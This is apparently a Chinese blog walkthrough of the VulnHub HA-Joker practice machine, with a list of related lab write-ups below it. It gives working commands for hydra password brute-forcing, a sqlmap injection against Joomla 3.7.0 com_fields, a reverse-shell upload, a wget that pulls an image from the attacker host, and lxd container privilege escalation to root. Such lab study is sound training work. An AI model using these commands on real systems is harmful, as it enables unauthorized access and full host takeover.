【靶机】vulnhub-HA-joker思考与总结

简介: 本次靶机以joker为主题,适合初学者,在本次靶机中你将学到,信息收集,网页爆破,sql注入,以及lxd提权。

靶机可去官网获取种子下载
www.vulnhub.com/entry/ha-joker,379

首先,信息收集
我们可以使用
nmap -sP -sV 192.168.112.0/24
nmap -p- 192.168.112.131
确定我们靶机ip与靶机开放哪些端口
请输入图片描述

然后我们访问80端口,与8080端口康康
我们看到8080需要账号密码才能进入

于是我们开始暴力破解

法1 bp直接爆破
详情请看b站演示
法2 hydra
hydra -L username.txt -P /usr/share/wordlists/rockyou.txt 192.168.112.131 -s 8080 http-get
-L后面跟用户名字典 -l跟用户名
-P后面跟密码字典
请输入图片描述

根据网页信息判断,又是我们的老朋友,joomla
于是我们用joomscan扫描
http://joker:hannah@192.168.112.131:8080/
joomscan -u +上面链接就可以了
又是3.7.0,可以走dc-3的老路了
具体joomscan使用可以看dc-3
法1(首推)
sqlmap -u "http://joker:hannah@192.168.112.131:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

请输入图片描述
请输入图片描述
我们看到可以注入,剩下的看dc-3吧

法2 bp
去看毕站演示

进后台后传入反弹shell木马
请输入图片描述
下来的操作依然和dc-3一样

我们拿到shell后输入
id,uname
看到我们有lxd权限,且系统版本为Ubuntu18.04
我们搜索Ubuntu18.04的漏洞
正好看到一个lxd提权漏洞
下来我们依照说明干就可以了。具体看毕站演示。

wget http://192.168.112.128:9999/alpine-v3.16-x86_64-20220901_1518.tar.gz

lxc image import ./alpine-v3.16-x86_64-20220901_1518.tar.gz --alias myimage

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

Id

目录
相关文章
|
SQL 安全 搜索推荐
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
靶机实战-vuluhub系列-vulnhub_DOUBLETROUBLE_1
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
123 2
Vulnhub靶机DC-1渗透笔记
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
153 1
VulnHub靶机DC3渗透笔记
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
107 0
VulnHub靶机DC2渗透测试笔记
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
Shell 网络安全 数据安全/隐私保护
HA-Avengers靶机渗透
HA-Avengers靶机渗透
|
安全 Shell 网络安全
vulnhub靶机 | DriftingBlues:7 write-up
vulnhub靶机 | DriftingBlues:7 write-up
113 0
|
SQL 算法 安全
BlackRose: 1-VulnHub
BlackRose: 1-VulnHub
|
SQL 网络协议 安全
靶机实战-vuluhub系列-pylington:1
靶机实战-vuluhub系列-pylington:1
靶机实战-vuluhub系列-pylington:1
|
SQL 安全 Shell
靶机实战-vuluhub系列-Me-and-My-girlfriend-1
靶机实战-vuluhub系列-Me-and-My-girlfriend-1
靶机实战-vuluhub系列-Me-and-My-girlfriend-1